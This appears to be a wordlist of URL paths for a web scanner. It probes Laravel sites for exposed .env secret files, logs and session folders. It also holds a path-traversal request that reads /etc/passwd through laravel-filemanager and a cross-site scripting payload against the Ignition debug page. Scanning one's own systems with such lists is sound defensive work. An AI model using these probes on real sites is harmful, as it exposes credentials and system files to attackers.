/.env
/.env.dev
/.env.dev.local
/.env.development.local
/.env.prod
/.env.prod.local
/.env.production
/.env.production.local
/.env.local
/.env.example
/.env.stage
/.env.live
/.env.backup
/.env.save
/.env.old
/.env.www
/.env_1
/.env_sample
/.env.{{DN}}
/.env.{{SD}}
/api/.env
/.env.bak
/laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd
/_ignition/scripts/--><svg%20onload=alert(document.domain)>
/storage/logs/laravel.log
{{paths}}
/public/index.php
:3000/public/index.php
/storage/framework/sessions/
/storage/sessions/
/asf/terminal
